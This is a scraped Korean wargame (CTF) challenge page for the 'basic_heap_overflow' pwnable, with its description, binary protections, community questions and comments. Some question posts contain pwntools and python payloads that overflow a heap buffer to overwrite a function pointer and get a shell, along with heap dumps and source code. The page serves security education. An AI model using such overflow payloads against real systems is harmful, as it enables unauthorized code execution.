LEVEL 1

basic_heap_overflow

pwnable
1620
652
로그인 하고 문제 풀기
  • 문제 정보
  • 풀이 71
  • 난이도 투표 36
  • 질문 4
  • 최근 풀이자 652
  • 댓글 51

문제 설명

Description

이 문제는 서버에서 작동하고 있는 서비스(basic_heap_overflow)의 바이너리와 소스 코드가 주어집니다.
프로그램의 취약점을 찾고 익스플로잇해 셸을 획득한 후, "flag" 파일을 읽으세요.
"flag" 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{...} 입니다.

Environment
Ubuntu 16.04
Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
Reference

Course Link

출제자 정보

avatar
Dreamhack
대표 업적 없음
2020.06.19. 16:18:49

First Blood!

avatar
JSec
Dreamhack Beta CTF 1위
출제된 지 2시간 만에 풀이 완료!

난이도 투표 36

질문 4

문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
쉘코드를 짯는데도 안되네요..
from pwn import * p = remote("host1.dreamhack.games",8446) elf = ELF("./basic_heap_overflow") get_shell = elf.symbols['get_shell'] p.sendline('A'*40 + p32(get_shell)) p.interactive() Ubuntu------ [+] Opening connection to host1.dreamhack.games on port 8446: Done [*] '/mnt/c/ctf/DreamHack/basic_heap_overflow/basic_heap_overflow' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [*] Switching to interactive mode [*] Got EOF while reading in interactive $ cat flag $ cat flag [*] Closed connection to host1.dreamhack.games port 8446 [*] Got EOF while sending in interactive 왜일까요..?
avatar Krafton
답변 0
추천 4
4년 전
로컬에서 바이너리 분석과 다른 것 같네요.. 무엇일까요..?
로컬에서 heap 영역을 보면 v5가 참조하는 table_func 주소가 있는 곳까지 48byte 만큼의 거리가 있어서 bof로 해서 로컬에서 table_func 주소를 get_shell로 변경하여 실행시켰습니다. 근데 호스트로 접속해서 페이로드를 날려도 안되길래 모가 잘못된거지하고 다른 분들의 writeup를 보니 40바이트로 되어있더군요 흐음... 분명히 제가 다운로드받은 바이너리에서는 48byte bof하고 get_shell 주소를 넣으면 되는 걸로 눈을 다시 씻고봐도 그렇게 보이는데..무엇이 잘못된 걸까요 **gef➤ x/30x 0x0804b1a0 0x804b1a0: 0x41414141 0x41414141 0x41414141 0x41414141 0x804b1b0: 0x41414141 0x41414141 0x41414141 0x41414141 0x804b1c0: 0x41414141 0x41414141 0x00000000 0x00000031 0x804b1d0: 0x08048694 0x00000000 0x00000000 0x00000000** 페이로드 결과 1 "A*48" *root@kali:~# (python -c 'print "A"48+"\x7b\x86\x04\x08"';cat)|./basic_heap_overflow id uid=0(root) gid=0(root) groups=0(root)** 페이로드 결과 2 "A*40" *root@kali:~# (python -c 'print "A"40+"\x7b\x86\x04\x08"';cat)|./basic_heap_overflow overwrite_me!**
jogeun
답변 1
추천 3
4년 전
pedaheap
16.04 버전에서는 pwndbg가 설치되지 않아서 peda를 사용 중인데 heap 영역은 어떻게 확인할 수 있을까요?
han76
답변 3
추천 1
2개월 전
프로그램상의 2번 malloc 실제로 allocated 된 3개의 chunck?
소스 코드 상에서는 2번의 malloc을 수행하는데 pwndbg의 heap 명령어를 통해 확인해보면 실제로 allocated 된 chunk는 3개인 것을 확인할 수 있습니다. int main() { char *ptr = malloc(0x20); struct over *over = malloc(0x20); initialize(); over->table = table_func; scanf("%s", ptr); if( !over->table ){ return 0; } over->table(); return 0; } Topchunk는 이해가 가는데, 이 191 바이트 크기의 heap영역+0x8부터 시작하는 chunk는 무엇인가요? (glibc 소스코드 오디팅을 통해서 해답을 찾을 수 있을거라 생각하는데, 너무 방대하여 어디부터 살펴보면 좋을지 감이 잘 오지 않습니다. 이에 glibc 디버깅을 위한 팁을 주신다면 매우 감사할 것 같습니다.)
avatar juntheworld
답변 2
추천 0
1년 전

최근 풀이자 652

avatar
하나마루
강의 수강: 1
3일 전
Rainyday
대표 업적 없음
4일 전
avatar
junan
공부벌레
4일 전
avatar
Ajirika
대표 업적 없음
5일 전
박상우
대표 업적 없음
6일 전
Madb33
강의 수강: 10
6일 전
haiha215
대표 업적 없음
7일 전
미역줄기줄기
대표 업적 없음
8일 전
unkn0vvn
대표 업적 없음
8일 전
avatar
z3rodae0
대표 업적 없음
8일 전

댓글 51

avatar
mini_chip
워게임 고인물
5개월 전
이런 경우에는 도배 또한 방법
avatar
LM_R3dzone
워게임 고인물
5개월 전
16.04에서 heap 할당 보기~
avatar
is07king
워게임: 1
8개월 전
로되리안이었는데 앞 댓글이 날 살렸다.
avatar
착한 범고래
워게임: 50
11개월 전
yammy
avatar
ssongk
공부벌레
1년 전
로되리안이라면 8바이트를 빼보세요!
avatar
msh1307
대표 업적 없음
2년 전
:)
avatar
Rayster
강의 수강: 10
2년 전
good
avatar
user99
워게임: 20
2년 전
맛있당
avatar
yoobi
워게임 고인물
2년 전
good
avatar
yellowday60
강의 수강: 1
2년 전
gg